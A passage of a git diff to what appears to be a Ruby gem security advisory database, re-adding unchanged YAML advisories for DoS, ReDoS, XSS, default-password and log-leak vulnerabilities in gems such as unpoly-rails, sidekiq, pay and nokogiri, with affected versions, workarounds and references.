-    - https://docs.nginx.com/nginx/admin-guide/load-balancer/http-health-check/#passive-health-checks
-    - https://makandracards.com/operations/537537-nginx-proxy-buffer-tuning
-    - https://tryhexadecimal.com/guides/http/414-request-uri-too-long
-    - https://unpoly.com/up.protocol
----
+---
+layout: advisory
+title: 'CVE-2023-28846 (unpoly-rails): unpoly-rails Denial of Service vulnerability'
+comments: false
+categories:
+- unpoly-rails
+advisory:
+  gem: unpoly-rails
+  cve: 2023-28846
+  ghsa: m875-3xf6-mf78
+  url: https://github.com/unpoly/unpoly-rails/security/advisories/GHSA-m875-3xf6-mf78
+  title: unpoly-rails Denial of Service vulnerability
+  date: 2023-03-30
+  description: |
+    There is a possible Denial of Service (DoS) vulnerability in the unpoly-rails
+    gem that implements the [Unpoly server protocol](https://unpoly.com/up.protocol)
+    for Rails applications.
+
+    ### Impact
+
+    This issues affects Rails applications
+    that operate as an upstream of a load balancer's that uses [passive health
+    checks](https://docs.nginx.com/nginx/admin-guide/load-balancer/http-health-check/#passive-health-checks).
+
+    The [unpoly-rails](https://github.com/unpoly/unpoly-rails/) gem echoes the request URL
+    as an `X-Up-Location` response header. By making a request with exceedingly long
+    URLs (paths or query string), an attacker can cause unpoly-rails to write a exceedingly
+    large response header.
+
+    If the response header is too large to be parsed by a load balancer downstream
+    of the Rails application, it may cause the load balancer to remove the upstream
+    from a load balancing group. This causes that application instance to become
+    unavailable until a configured timeout is reached or until an active healthcheck
+    succeeds.
+
+    ### Workarounds
+
+    If you cannot upgrade to a fixed release, several workarounds are available:
+
+    - Configure your load balancer to
+      use active health checks, e.g. by periodically requesting a route with a known response
+      that indicates healthiness.
+    - Configure your load balancer so the [maximum size
+      of response headers](https://makandracards.com/operations/537537-nginx-proxy-buffer-tuning)
+      is at least twice the [maximum size of a URL](https://tryhexadecimal.com/guides/http/414-request-uri-too-long).
+    - Instead of changing your server configuration you may also configure your Rails
+      application to delete redundant `X-Up-Location` headers set by unpoly-rails:
+
+      ```ruby
+      class ApplicationController < ActionController::Base
+
+        after_action :remove_redundant_up_location_header
+
+        private
+
+        def remove_redundant_up_location_header
+          if request.original_url == response.headers['X-Up-Location']
+            response.headers.delete('X-Up-Location')
+          end
+        end
+
+      end
+    ```
+  cvss_v3: 5.9
+  patched_versions:
+  - ">= 2.7.2.2"
+  related:
+    url:
+    - https://github.com/unpoly/unpoly-rails/commit/cd9ad0007daceeb3b2354fdcab4f88350427bf16
+    - https://docs.nginx.com/nginx/admin-guide/load-balancer/http-health-check/#passive-health-checks
+    - https://makandracards.com/operations/537537-nginx-proxy-buffer-tuning
+    - https://tryhexadecimal.com/guides/http/414-request-uri-too-long
+    - https://unpoly.com/up.protocol
+---
diff --git a/advisories/_posts/2023-03-31-CVE-2023-28755.md b/advisories/_posts/2023-03-31-CVE-2023-28755.md
index 96cc0be5..124489cd 100644
--- a/advisories/_posts/2023-03-31-CVE-2023-28755.md
+++ b/advisories/_posts/2023-03-31-CVE-2023-28755.md
@@ -1,26 +1,26 @@
----
-layout: advisory
-title: 'CVE-2023-28755 (uri): Ruby URI component ReDoS issue'
-comments: false
-categories:
-- uri
-advisory:
-  gem: uri
-  cve: 2023-28755
-  ghsa: hv5j-3h9f-99c2
-  url: https://github.com/advisories/GHSA-hv5j-3h9f-99c2
-  title: Ruby URI component ReDoS issue
-  date: 2023-03-31
-  description: |
-    A ReDoS issue was discovered in the URI component through 0.12.0 in
-    Ruby through 3.2.1. The URI parser mishandles invalid URLs that have
-    specific characters. It causes an increase in execution time for parsing
-    strings to URI objects. The fixed versions are 0.12.1, 0.11.1,
-    0.10.2 and 0.10.0.1.
-  cvss_v3: 7.5
-  patched_versions:
-  - "~> 0.10.0.1"
-  - "~> 0.10.2"
-  - "~> 0.11.1"
-  - ">= 0.12.1"
----
+---
+layout: advisory
+title: 'CVE-2023-28755 (uri): Ruby URI component ReDoS issue'
+comments: false
+categories:
+- uri
+advisory:
+  gem: uri
+  cve: 2023-28755
+  ghsa: hv5j-3h9f-99c2
+  url: https://github.com/advisories/GHSA-hv5j-3h9f-99c2
+  title: Ruby URI component ReDoS issue
+  date: 2023-03-31
+  description: |
+    A ReDoS issue was discovered in the URI component through 0.12.0 in
+    Ruby through 3.2.1. The URI parser mishandles invalid URLs that have
+    specific characters. It causes an increase in execution time for parsing
+    strings to URI objects. The fixed versions are 0.12.1, 0.11.1,
+    0.10.2 and 0.10.0.1.
+  cvss_v3: 7.5
+  patched_versions:
+  - "~> 0.10.0.1"
+  - "~> 0.10.2"
+  - "~> 0.11.1"
+  - ">= 0.12.1"
+---
diff --git a/advisories/_posts/2023-03-31-CVE-2023-28756.md b/advisories/_posts/2023-03-31-CVE-2023-28756.md
index 5ec62734..bf3f0633 100644
--- a/advisories/_posts/2023-03-31-CVE-2023-28756.md
+++ b/advisories/_posts/2023-03-31-CVE-2023-28756.md
@@ -1,26 +1,26 @@
----
-layout: advisory
-title: 'CVE-2023-28756 (time): Ruby Time component ReDos issue'
-comments: false
-categories:
-- time
-advisory:
-  gem: time
-  cve: 2023-28756
-  ghsa: fg7x-g82r-94qc
-  url: https://www.ruby-lang.org/en/news/2023/03/30/redos-in-time-cve-2023-28756/
-  title: Ruby Time component ReDos issue
-  date: 2023-03-31
-  description: |
-    A ReDoS issue was discovered in the Time component through 0.2.1 in Ruby
-    through 3.2.1. The Time parser mishandles invalid URLs that have specific characters.
-    It causes an increase in execution time for parsing strings to Time objects. The
-    fixed versions are 0.1.1 and 0.2.2.
-  cvss_v3: 7.5
-  patched_versions:
-  - "~> 0.1.1"
-  - ">= 0.2.2"
-  related:
-    url:
-    - https://www.ruby-lang.org/en/news/2022/12/25/ruby-3-2-0-released/
----
+---
+layout: advisory
+title: 'CVE-2023-28756 (time): Ruby Time component ReDos issue'
+comments: false
+categories:
+- time
+advisory:
+  gem: time
+  cve: 2023-28756
+  ghsa: fg7x-g82r-94qc
+  url: https://www.ruby-lang.org/en/news/2023/03/30/redos-in-time-cve-2023-28756/
+  title: Ruby Time component ReDos issue
+  date: 2023-03-31
+  description: |
+    A ReDoS issue was discovered in the Time component through 0.2.1 in Ruby
+    through 3.2.1. The Time parser mishandles invalid URLs that have specific characters.
+    It causes an increase in execution time for parsing strings to Time objects. The
+    fixed versions are 0.1.1 and 0.2.2.
+  cvss_v3: 7.5
+  patched_versions:
+  - "~> 0.1.1"
+  - ">= 0.2.2"
+  related:
+    url:
+    - https://www.ruby-lang.org/en/news/2022/12/25/ruby-3-2-0-released/
+---
diff --git a/advisories/_posts/2023-03-31-GHSA-48wp-p9qv-4j64.md b/advisories/_posts/2023-03-31-GHSA-48wp-p9qv-4j64.md
index c324f643..cf6a85f9 100644
--- a/advisories/_posts/2023-03-31-GHSA-48wp-p9qv-4j64.md
+++ b/advisories/_posts/2023-03-31-GHSA-48wp-p9qv-4j64.md
@@ -1,51 +1,51 @@
----
-layout: advisory
-title: 'GHSA-48wp-p9qv-4j64 (commonmarker): Commonmarker vulnerable to to several
-  quadratic complexity bugs that may lead to denial of service'
-comments: false
-categories:
-- commonmarker
-advisory:
-  gem: commonmarker
-  ghsa: 48wp-p9qv-4j64
-  url: https://github.com/gjtorikian/commonmarker/releases/tag/v0.23.9
-  title: Commonmarker vulnerable to to several quadratic complexity bugs that may
-    lead to denial of service
-  date: 2023-03-31
-  description: |
-    ## Impact
-
-    Several quadratic complexity bugs in commonmarker's underlying
-    cmark-gfm library may lead to unbounded resource exhaustion and
-    subsequent denial of service.
-
-    The following vulnerabilities were addressed:
-    * CVE-2023-24824
-    * CVE-2023-26485
-
-    For more information, consult the release notes for versions
-    0.23.0.gfm.10 and 0.23.0.gfm.11.
-
-    ## Mitigation
-
-    Users are advised to upgrade to commonmarker version 0.23.9
-  cvss_v3: 7.5
-  patched_versions:
-  - ">= 0.23.9"
-  related:
-    cve:
-    - 2023-24824
-    - 2023-26485
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2023-24824
-    - https://nvd.nist.gov/vuln/detail/CVE-2023-26485
-    - https://github.com/gjtorikian/commonmarker/pull/236
-    - https://rubygems.org/gems/commonmarker/versions/0.23.9
-    - https://github.com/gjtorikian/commonmarker/releases/tag/v0.23.9
-    - https://github.com/gjtorikian/commonmarker/security/advisories/GHSA-48wp-p9qv-4j64
-    - https://github.com/github/cmark-gfm/commit/2300c1bd2c8226108885bf019655c4159cf26b59
-    - https://github.com/github/cmark-gfm/security/advisories/GHSA-66g8-4hjf-77xh
-    - https://github.com/github/cmark-gfm/security/advisories/GHSA-r8vr-c48j-fcc5
-    - https://github.com/github/cmark-gfm/releases/tag/0.29.0.gfm.10
-    - https://github.com/github/cmark-gfm/releases/tag/0.29.0.gfm.11
----
+---
+layout: advisory
+title: 'GHSA-48wp-p9qv-4j64 (commonmarker): Commonmarker vulnerable to to several
+  quadratic complexity bugs that may lead to denial of service'
+comments: false
+categories:
+- commonmarker
+advisory:
+  gem: commonmarker
+  ghsa: 48wp-p9qv-4j64
+  url: https://github.com/gjtorikian/commonmarker/releases/tag/v0.23.9
+  title: Commonmarker vulnerable to to several quadratic complexity bugs that may
+    lead to denial of service
+  date: 2023-03-31
+  description: |
+    ## Impact
+
+    Several quadratic complexity bugs in commonmarker's underlying
+    cmark-gfm library may lead to unbounded resource exhaustion and
+    subsequent denial of service.
+
+    The following vulnerabilities were addressed:
+    * CVE-2023-24824
+    * CVE-2023-26485
+
+    For more information, consult the release notes for versions
+    0.23.0.gfm.10 and 0.23.0.gfm.11.
+
+    ## Mitigation
+
+    Users are advised to upgrade to commonmarker version 0.23.9
+  cvss_v3: 7.5
+  patched_versions:
+  - ">= 0.23.9"
+  related:
+    cve:
+    - 2023-24824
+    - 2023-26485
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-24824
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-26485
+    - https://github.com/gjtorikian/commonmarker/pull/236
+    - https://rubygems.org/gems/commonmarker/versions/0.23.9
+    - https://github.com/gjtorikian/commonmarker/releases/tag/v0.23.9
+    - https://github.com/gjtorikian/commonmarker/security/advisories/GHSA-48wp-p9qv-4j64
+    - https://github.com/github/cmark-gfm/commit/2300c1bd2c8226108885bf019655c4159cf26b59
+    - https://github.com/github/cmark-gfm/security/advisories/GHSA-66g8-4hjf-77xh
+    - https://github.com/github/cmark-gfm/security/advisories/GHSA-r8vr-c48j-fcc5
+    - https://github.com/github/cmark-gfm/releases/tag/0.29.0.gfm.10
+    - https://github.com/github/cmark-gfm/releases/tag/0.29.0.gfm.11
+---
diff --git a/advisories/_posts/2023-04-04-CVE-2020-21514.md b/advisories/_posts/2023-04-04-CVE-2020-21514.md
index d907d74b..7eb7d24a 100644
--- a/advisories/_posts/2023-04-04-CVE-2020-21514.md
+++ b/advisories/_posts/2023-04-04-CVE-2020-21514.md
@@ -1,25 +1,25 @@
----
-layout: advisory
-title: 'CVE-2020-21514 (fluentd-ui): Fluent Fluentd and Fluent-ui use default password'
-comments: false
-categories:
-- fluentd-ui
-advisory:
-  gem: fluentd-ui
-  cve: 2020-21514
-  ghsa: wrxf-x8rm-6ggg
-  url: https://github.com/advisories/GHSA-wrxf-x8rm-6ggg
-  title: Fluent Fluentd and Fluent-ui use default password
-  date: 2023-04-04
-  description: |
-    An issue was discovered in Fluent Fluentd v.1.8.0 and Fluent-ui v.1.2.2
-    that allows attackers to gain escilated privileges and execute arbitrary code due
-    to use of a default password.
-  cvss_v3: 8.8
-  notes: Never patched
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2020-21514
-    - https://github.com/fluent/fluentd-ui/issues/295
-    - https://github.com/advisories/GHSA-wrxf-x8rm-6ggg
----
+---
+layout: advisory
+title: 'CVE-2020-21514 (fluentd-ui): Fluent Fluentd and Fluent-ui use default password'
+comments: false
+categories:
+- fluentd-ui
+advisory:
+  gem: fluentd-ui
+  cve: 2020-21514
+  ghsa: wrxf-x8rm-6ggg
+  url: https://github.com/advisories/GHSA-wrxf-x8rm-6ggg
+  title: Fluent Fluentd and Fluent-ui use default password
+  date: 2023-04-04
+  description: |
+    An issue was discovered in Fluent Fluentd v.1.8.0 and Fluent-ui v.1.2.2
+    that allows attackers to gain escilated privileges and execute arbitrary code due
+    to use of a default password.
+  cvss_v3: 8.8
+  notes: Never patched
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-21514
+    - https://github.com/fluent/fluentd-ui/issues/295
+    - https://github.com/advisories/GHSA-wrxf-x8rm-6ggg
+---
diff --git a/advisories/_posts/2023-04-11-CVE-2024-22048.md b/advisories/_posts/2023-04-11-CVE-2024-22048.md
index 912afa46..a2699ff6 100644
--- a/advisories/_posts/2023-04-11-CVE-2024-22048.md
+++ b/advisories/_posts/2023-04-11-CVE-2024-22048.md
@@ -1,48 +1,48 @@
----
-layout: advisory
-title: 'CVE-2024-22048 (govuk_tech_docs): govuk_tech_docs vulnerable to unescaped
-  HTML on search results page'
-comments: false
-categories:
-- govuk_tech_docs
-advisory:
-  gem: govuk_tech_docs
-  cve: 2024-22048
-  ghsa: x2xw-hw8g-6773
-  url: https://github.com/alphagov/tech-docs-gem/security/advisories/GHSA-x2xw-hw8g-6773
-  title: govuk_tech_docs vulnerable to unescaped HTML on search results page
-  date: 2023-04-11
-  description: |2
-
-    ### Impact
-
-    Pages that are indexed in search results have their entire contents
-    indexed, including any HTML code snippets. These HTML snippets would
-    appear in the search results unsanitised, so it was possible to
-    render arbitrary HTML or run arbitrary scripts.
-
-    This is a low risk security issue; to exploit it, an attacker would
-    need to find a way of committing malicious code to a page indexed
-    by a site that uses tech-docs-gem (which are typically not editable
-    by untrusted users). Their code would also be limited by the relatively
-    short length that's rendered in the corresponding search result.
-    Nevertheless, the XSS would then be triggerable by visiting a
-    pre-constructed URL (/search/index.html?q=some+search+term), which
-    users could be tricked into clicking on through social engineering.
-
-    ### Patches
-
-    This has been fixed in v3.3.1. HTML is now sanitised in search results.
-  cvss_v3: 6.1
-  unaffected_versions:
-  - "< 2.0.2"
-  patched_versions:
-  - ">= 3.3.1"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2024-22048
-    - https://github.com/alphagov/tech-docs-gem/security/advisories/GHSA-x2xw-hw8g-6773
-    - https://github.com/alphagov/tech-docs-gem/releases/tag/v3.3.1
-    - https://github.com/alphagov/tech-docs-gem/pull/323
-    - https://github.com/advisories/GHSA-x2xw-hw8g-6773
----
+---
+layout: advisory
+title: 'CVE-2024-22048 (govuk_tech_docs): govuk_tech_docs vulnerable to unescaped
+  HTML on search results page'
+comments: false
+categories:
+- govuk_tech_docs
+advisory:
+  gem: govuk_tech_docs
+  cve: 2024-22048
+  ghsa: x2xw-hw8g-6773
+  url: https://github.com/alphagov/tech-docs-gem/security/advisories/GHSA-x2xw-hw8g-6773
+  title: govuk_tech_docs vulnerable to unescaped HTML on search results page
+  date: 2023-04-11
+  description: |2
+
+    ### Impact
+
+    Pages that are indexed in search results have their entire contents
+    indexed, including any HTML code snippets. These HTML snippets would
+    appear in the search results unsanitised, so it was possible to
+    render arbitrary HTML or run arbitrary scripts.
+
+    This is a low risk security issue; to exploit it, an attacker would
+    need to find a way of committing malicious code to a page indexed
+    by a site that uses tech-docs-gem (which are typically not editable
+    by untrusted users). Their code would also be limited by the relatively
+    short length that's rendered in the corresponding search result.
+    Nevertheless, the XSS would then be triggerable by visiting a
+    pre-constructed URL (/search/index.html?q=some+search+term), which
+    users could be tricked into clicking on through social engineering.
+
+    ### Patches
+
+    This has been fixed in v3.3.1. HTML is now sanitised in search results.
+  cvss_v3: 6.1
+  unaffected_versions:
+  - "< 2.0.2"
+  patched_versions:
+  - ">= 3.3.1"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-22048
+    - https://github.com/alphagov/tech-docs-gem/security/advisories/GHSA-x2xw-hw8g-6773
+    - https://github.com/alphagov/tech-docs-gem/releases/tag/v3.3.1
+    - https://github.com/alphagov/tech-docs-gem/pull/323
+    - https://github.com/advisories/GHSA-x2xw-hw8g-6773
+---
diff --git a/advisories/_posts/2023-04-11-GHSA-pxvg-2qj5-37jq.md b/advisories/_posts/2023-04-11-GHSA-pxvg-2qj5-37jq.md
index 69f9d025..c09e0c2c 100644
--- a/advisories/_posts/2023-04-11-GHSA-pxvg-2qj5-37jq.md
+++ b/advisories/_posts/2023-04-11-GHSA-pxvg-2qj5-37jq.md
@@ -1,62 +1,62 @@
----
-layout: advisory
-title: 'GHSA-pxvg-2qj5-37jq (nokogiri): Update packaged libxml2 to v2.10.4 to resolve
-  multiple CVEs'
-comments: false
-categories:
-- nokogiri
-advisory:
-  gem: nokogiri
-  ghsa: pxvg-2qj5-37jq
-  url: https://github.com/sparklemotion/nokogiri/security/advisories/GHSA-pxvg-2qj5-37jq
-  title: Update packaged libxml2 to v2.10.4 to resolve multiple CVEs
-  date: 2023-04-11
-  description: |
-    ### Summary
-
-    Nokogiri v1.14.3 upgrades the packaged version of its dependency libxml2 to
-    [v2.10.4](https://gitlab.gnome.org/GNOME/libxml2/-/releases/v2.10.4) from v2.10.3.
-
-    libxml2 v2.10.4 addresses the following known vulnerabilities:
-
-    - [CVE-2023-29469](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29469): Hashing of
-      empty dict strings isn't deterministic
-    - [CVE-2023-28484](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-28484): Fix null deref
-      in xmlSchemaFixupComplexType
-    - Schemas: Fix null-pointer-deref in xmlSchemaCheckCOSSTDerivedOK
-
-    Please note that this advisory only applies to the CRuby implementation of Nokogiri `< 1.14.3`,
-    and only if the _packaged_ libraries are being used. If you've overridden defaults at installation
-    time to use _system_ libraries instead of packaged libraries, you should instead pay attention to
-    your distro's `libxml2` release announcements.
-
-
-    ### Mitigation
-
-    Upgrade to Nokogiri `>= 1.14.3`.
-
-    Users who are unable to upgrade Nokogiri may also choose a more complicated mitigation: compile
-    and link Nokogiri against external libraries libxml2 `>= 2.10.4` which will also address these
-    same issues.
-
-
-    ### Impact
-
-    No public information has yet been published about the security-related issues other than the
-    upstream commits. Examination of those changesets indicate that the more serious issues relate to
-    libxml2 dereferencing NULL pointers and potentially segfaulting while parsing untrusted inputs.
-
-    The commits can be examined at:
-
-    - [\[CVE-2023-29469\] Hashing of empty dict strings isn't deterministic (09a2dd45)](https://gitlab.gnome.org/GNOME/libxml2/-/commit/09a2dd453007f9c7205274623acdd73747c22d64)
-    - [\[CVE-2023-28484\] Fix null deref in xmlSchemaFixupComplexType (647e072e)](https://gitlab.gnome.org/GNOME/libxml2/-/commit/647e072ea0a2f12687fa05c172f4c4713fdb0c4f)
-    - [schemas: Fix null-pointer-deref in xmlSchemaCheckCOSSTDerivedOK (4c6922f7)](https://gitlab.gnome.org/GNOME/libxml2/-/commit/4c6922f763ad958c48ff66f82823ae21f2e92ee6)
-  patched_versions:
-  - ">= 1.14.3"
-  related:
-    url:
-    - https://gitlab.gnome.org/GNOME/libxml2/-/releases/v2.10.4
-    cve:
-    - 2023-29469
-    - 2023-28484
----
+---
+layout: advisory
+title: 'GHSA-pxvg-2qj5-37jq (nokogiri): Update packaged libxml2 to v2.10.4 to resolve
+  multiple CVEs'
+comments: false
+categories:
+- nokogiri
+advisory:
+  gem: nokogiri
+  ghsa: pxvg-2qj5-37jq
+  url: https://github.com/sparklemotion/nokogiri/security/advisories/GHSA-pxvg-2qj5-37jq
+  title: Update packaged libxml2 to v2.10.4 to resolve multiple CVEs
+  date: 2023-04-11
+  description: |
+    ### Summary
+
+    Nokogiri v1.14.3 upgrades the packaged version of its dependency libxml2 to
+    [v2.10.4](https://gitlab.gnome.org/GNOME/libxml2/-/releases/v2.10.4) from v2.10.3.
+
+    libxml2 v2.10.4 addresses the following known vulnerabilities:
+
+    - [CVE-2023-29469](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29469): Hashing of
+      empty dict strings isn't deterministic
+    - [CVE-2023-28484](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-28484): Fix null deref
+      in xmlSchemaFixupComplexType
+    - Schemas: Fix null-pointer-deref in xmlSchemaCheckCOSSTDerivedOK
+
+    Please note that this advisory only applies to the CRuby implementation of Nokogiri `< 1.14.3`,
+    and only if the _packaged_ libraries are being used. If you've overridden defaults at installation
+    time to use _system_ libraries instead of packaged libraries, you should instead pay attention to
+    your distro's `libxml2` release announcements.
+
+
+    ### Mitigation
+
+    Upgrade to Nokogiri `>= 1.14.3`.
+
+    Users who are unable to upgrade Nokogiri may also choose a more complicated mitigation: compile
+    and link Nokogiri against external libraries libxml2 `>= 2.10.4` which will also address these
+    same issues.
+
+
+    ### Impact
+
+    No public information has yet been published about the security-related issues other than the
+    upstream commits. Examination of those changesets indicate that the more serious issues relate to
+    libxml2 dereferencing NULL pointers and potentially segfaulting while parsing untrusted inputs.
+
+    The commits can be examined at:
+
+    - [\[CVE-2023-29469\] Hashing of empty dict strings isn't deterministic (09a2dd45)](https://gitlab.gnome.org/GNOME/libxml2/-/commit/09a2dd453007f9c7205274623acdd73747c22d64)
+    - [\[CVE-2023-28484\] Fix null deref in xmlSchemaFixupComplexType (647e072e)](https://gitlab.gnome.org/GNOME/libxml2/-/commit/647e072ea0a2f12687fa05c172f4c4713fdb0c4f)
+    - [schemas: Fix null-pointer-deref in xmlSchemaCheckCOSSTDerivedOK (4c6922f7)](https://gitlab.gnome.org/GNOME/libxml2/-/commit/4c6922f763ad958c48ff66f82823ae21f2e92ee6)
+  patched_versions:
+  - ">= 1.14.3"
+  related:
+    url:
+    - https://gitlab.gnome.org/GNOME/libxml2/-/releases/v2.10.4
+    cve:
+    - 2023-29469
+    - 2023-28484
+---
diff --git a/advisories/_posts/2023-04-20-CVE-2023-30614.md b/advisories/_posts/2023-04-20-CVE-2023-30614.md
index aa867b12..804413f8 100644
--- a/advisories/_posts/2023-04-20-CVE-2023-30614.md
+++ b/advisories/_posts/2023-04-20-CVE-2023-30614.md
@@ -1,38 +1,38 @@
----
-layout: advisory
-title: 'CVE-2023-30614 (pay): Improper Neutralization of Script-Related HTML Tags
-  in a Web Page (Basic XSS) in Pay'
-comments: false
-categories:
-- pay
-advisory:
-  gem: pay
-  cve: 2023-30614
-  ghsa: cqf3-vpx7-rxhw
-  url: https://github.com/pay-rails/pay/security/advisories/GHSA-cqf3-vpx7-rxhw
-  title: Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic
-    XSS) in Pay
-  date: 2023-04-20
-  description: |
-    Impact
-      A payments info page of Pay is susceptible to reflected Cross-site
-      scripting. An attacker could create a working URL that renders a
-      javascript link to a user on a Rails application that integrates
-      Pay. This URL could be distributed via email to specifically target
-      certain individuals. If the targeted application contains a
-      functionality to submit user-generated content (such as comments)
-      the attacker could even distribute the URL using that functionality.
-    Patches
-      This has been patched in version 6.3.2 and above.
-      Pay will now sanitize the `back` parameter and only permit relative paths.
-  cvss_v3: 7.1
-  patched_versions:
-  - ">= 6.3.2"
-  related:
-    url:
-    - https://github.com/pay-rails/pay/security/advisories/GHSA-cqf3-vpx7-rxhw
-    - https://nvd.nist.gov/vuln/detail/CVE-2023-30614
-    - https://github.com/pay-rails/pay/commit/5d6283a24062bd272a524ec48415f536a67ad57f
-    - https://github.com/pay-rails/pay/commit/c067771d8c7514acde4b948b474caf054bb0e25d
-    - https://github.com/advisories/GHSA-cqf3-vpx7-rxhw
----
+---
+layout: advisory
+title: 'CVE-2023-30614 (pay): Improper Neutralization of Script-Related HTML Tags
+  in a Web Page (Basic XSS) in Pay'
+comments: false
+categories:
+- pay
+advisory:
+  gem: pay
+  cve: 2023-30614
+  ghsa: cqf3-vpx7-rxhw
+  url: https://github.com/pay-rails/pay/security/advisories/GHSA-cqf3-vpx7-rxhw
+  title: Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic
+    XSS) in Pay
+  date: 2023-04-20
+  description: |
+    Impact
+      A payments info page of Pay is susceptible to reflected Cross-site
+      scripting. An attacker could create a working URL that renders a
+      javascript link to a user on a Rails application that integrates
+      Pay. This URL could be distributed via email to specifically target
+      certain individuals. If the targeted application contains a
+      functionality to submit user-generated content (such as comments)
+      the attacker could even distribute the URL using that functionality.
+    Patches
+      This has been patched in version 6.3.2 and above.
+      Pay will now sanitize the `back` parameter and only permit relative paths.
+  cvss_v3: 7.1
+  patched_versions:
+  - ">= 6.3.2"
+  related:
+    url:
+    - https://github.com/pay-rails/pay/security/advisories/GHSA-cqf3-vpx7-rxhw
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-30614
+    - https://github.com/pay-rails/pay/commit/5d6283a24062bd272a524ec48415f536a67ad57f
+    - https://github.com/pay-rails/pay/commit/c067771d8c7514acde4b948b474caf054bb0e25d
+    - https://github.com/advisories/GHSA-cqf3-vpx7-rxhw
+---
diff --git a/advisories/_posts/2023-04-21-CVE-2023-1892.md b/advisories/_posts/2023-04-21-CVE-2023-1892.md
index a4e282d6..f74c788e 100644
--- a/advisories/_posts/2023-04-21-CVE-2023-1892.md
+++ b/advisories/_posts/2023-04-21-CVE-2023-1892.md
@@ -1,29 +1,29 @@
----
-layout: advisory
-title: 'CVE-2023-1892 (sidekiq): sidekiq vulnerable to cross-site scripting'
-comments: false
-categories:
-- sidekiq
-advisory:
-  gem: sidekiq
-  cve: 2023-1892
-  ghsa: h3r8-h5qw-4r35
-  url: https://github.com/sidekiq/sidekiq/commit/458fdf74176a9881478c48dc5cf0269107b22214
-  title: sidekiq vulnerable to cross-site scripting
-  date: 2023-04-21
-  description: |
-    sidekiq from 7.0.4 to 7.0.7 is vulnerable to reflected cross-site scripting.
-    A fix was released in version 7.0.8.
-  cvss_v3: 8.3
-  unaffected_versions:
-  - "< 7.0.4"
-  patched_versions:
-  - ">= 7.0.8"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2023-1892
-    - https://github.com/sidekiq/sidekiq/commit/458fdf74176a9881478c48dc5cf0269107b22214
-    - https://huntr.dev/bounties/e35e5653-c429-4fb8-94a3-cbc123ae4777
-    - https://github.com/sidekiq/sidekiq/blob/main/Changes.md#708
-    - https://github.com/advisories/GHSA-h3r8-h5qw-4r35
----
+---
+layout: advisory
+title: 'CVE-2023-1892 (sidekiq): sidekiq vulnerable to cross-site scripting'
+comments: false
+categories:
+- sidekiq
+advisory:
+  gem: sidekiq
+  cve: 2023-1892
+  ghsa: h3r8-h5qw-4r35
+  url: https://github.com/sidekiq/sidekiq/commit/458fdf74176a9881478c48dc5cf0269107b22214
+  title: sidekiq vulnerable to cross-site scripting
+  date: 2023-04-21
+  description: |
+    sidekiq from 7.0.4 to 7.0.7 is vulnerable to reflected cross-site scripting.
+    A fix was released in version 7.0.8.
+  cvss_v3: 8.3
+  unaffected_versions:
+  - "< 7.0.4"
+  patched_versions:
+  - ">= 7.0.8"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-1892
+    - https://github.com/sidekiq/sidekiq/commit/458fdf74176a9881478c48dc5cf0269107b22214
+    - https://huntr.dev/bounties/e35e5653-c429-4fb8-94a3-cbc123ae4777
+    - https://github.com/sidekiq/sidekiq/blob/main/Changes.md#708
+    - https://github.com/advisories/GHSA-h3r8-h5qw-4r35
+---
diff --git a/advisories/_posts/2023-04-24-CVE-2023-30618.md b/advisories/_posts/2023-04-24-CVE-2023-30618.md
index 7b547999..94f0d7b1 100644
--- a/advisories/_posts/2023-04-24-CVE-2023-30618.md
+++ b/advisories/_posts/2023-04-24-CVE-2023-30618.md
@@ -1,41 +1,41 @@
----
-layout: advisory
-title: 'CVE-2023-30618 (kitchen-terraform): Sensitive Terraform Output Values Printed
-  At Info Logging Level In Kitchen-Terraform'
-comments: false
-categories:
-- kitchen-terraform
-advisory:
-  gem: kitchen-terraform
-  cve: 2023-30618
-  ghsa: 65g2-x53q-cmf6
-  url: https://github.com/newcontext-oss/kitchen-terraform/security/advisories/GHSA-65g2-x53q-cmf6
-  title: Sensitive Terraform Output Values Printed At Info Logging Level In Kitchen-Terraform
-  date: 2023-04-24
-  description: |
-    Summary
-      Kitchen-Terraform v7.0.0 introduced a regression which caused all
-      Terraform output values, including sensitive values, to be printed
-      at the `info` logging level during the `kitchen converge` action.
-      Prior to v7.0.0, the output values were printed at the `debug` level
-      to avoid writing sensitive values to the terminal by default.
-
-    ### Original Report
-      @brettcurtis:
-        Hopefully, I'm not doing something stupid here, but I'm seeing
-        sensitive outputs printed in the kitchen output. You can check
-        this action for an example: https://github.com/osinfra-io/terraform-google-project/actions/runs/4700065515/jobs/8334277309#step:5:215
-
-        It's not really a sensitive value just used it as an example.
-  cvss_v3: 3.2
-  unaffected_versions:
-  - "< 7.0.0"
-  patched_versions:
-  - ">= 7.0.1"
-  related:
-    url:
-    - https://github.com/newcontext-oss/kitchen-terraform/security/advisories/GHSA-65g2-x53q-cmf6
-    - https://nvd.nist.gov/vuln/detail/CVE-2023-30618
-    - https://github.com/newcontext-oss/kitchen-terraform/commit/3d20d60e7a891e2dd747df995a31226fa0b4ac48
-    - https://github.com/advisories/GHSA-65g2-x53q-cmf6
----
+---
+layout: advisory
+title: 'CVE-2023-30618 (kitchen-terraform): Sensitive Terraform Output Values Printed
+  At Info Logging Level In Kitchen-Terraform'
+comments: false
+categories:
+- kitchen-terraform
+advisory:
+  gem: kitchen-terraform
+  cve: 2023-30618
+  ghsa: 65g2-x53q-cmf6
+  url: https://github.com/newcontext-oss/kitchen-terraform/security/advisories/GHSA-65g2-x53q-cmf6
+  title: Sensitive Terraform Output Values Printed At Info Logging Level In Kitchen-Terraform
+  date: 2023-04-24
+  description: |
+    Summary
+      Kitchen-Terraform v7.0.0 introduced a regression which caused all
+      Terraform output values, including sensitive values, to be printed
